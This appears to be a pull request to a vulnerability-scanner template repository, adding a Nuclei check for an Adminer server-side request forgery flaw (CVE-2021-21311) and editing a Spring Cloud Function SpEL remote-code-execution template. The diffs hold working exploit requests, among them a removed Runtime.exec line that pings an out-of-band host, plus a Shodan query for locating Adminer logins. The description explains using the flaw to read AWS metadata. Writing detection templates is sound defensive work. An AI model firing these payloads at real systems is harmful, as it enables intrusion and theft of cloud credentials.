### PR TITLE
Nuclei Template for Adminer SSRF Issue (CVE-2021-21311)

### DIFF
--- a/cves/2021/CVE-2021-21311.yaml
+++ b/cves/2021/CVE-2021-21311.yaml
@@ -1,0 +1,27 @@
+id: CVE-2021-21311
+
+info:
+  name: Adminer SSRF Using Error Page on ElasticSearch and ClickHouse (CVE-2021-21311)
+  author: Adam Crosser
+  severity: high
+  description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
+  reference:
+    - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
+    - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
+  tags: adminer,ssrf
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/adminer?elastic=example.com&username="
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 403
+
+      - type: word
+        part: body
+        words:
+          - "&lt;title&gt;400 - Bad Request&lt;/title&gt;"

--- a/cves/2021/CVE-2021-21311.yaml
+++ b/cves/2021/CVE-2021-21311.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
     - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
+  metadata:
+    shodan-query: title:"Login - Adminer"
   tags: adminer,ssrf
 
 requests:

--- a/cves/2021/CVE-2021-21311.yaml
+++ b/cves/2021/CVE-2021-21311.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-21311
 
 info:
-  name: Adminer SSRF Using Error Page on ElasticSearch and ClickHouse (CVE-2021-21311)
+  name: Adminer SSRF Using Verbose Error Messages (CVE-2021-21311)
   author: Adam Crosser
   severity: high
   description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
@@ -11,6 +11,7 @@ info:
   metadata:
     shodan-query: title:"Login - Adminer"
   tags: adminer,ssrf
+
 
 requests:
   - method: GET

--- a/cves/2022/CVE-2022-22963.yaml
+++ b/cves/2022/CVE-2022-22963.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-22963
 
 info:
   name: Spring Cloud Function SPEL RCE
-  author: Mr-xn
+  author: Mr-xn,Adam Crosser
   severity: critical
   reference:
     - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
@@ -17,7 +17,7 @@ requests:
       - |
         POST /functionRouter HTTP/1.1
         Host: {{Hostname}}
-        spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
+        spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
         Content-Type: application/x-www-form-urlencoded
 
         {{rand_base(8)}}


### PR DESCRIPTION
### Template / PR Information

We've made a Nuclei template for CVE-2021-21311 an SSRF issue in Adminer that can be leveraged to read data from the AWS metadata service through a verbose error message (writeup here - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf). This is accomplished by having Adminer connect to an attacker controlled system and redirecting to the AWS metadata service. The connection fails and prints the output of the response received from the server.

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO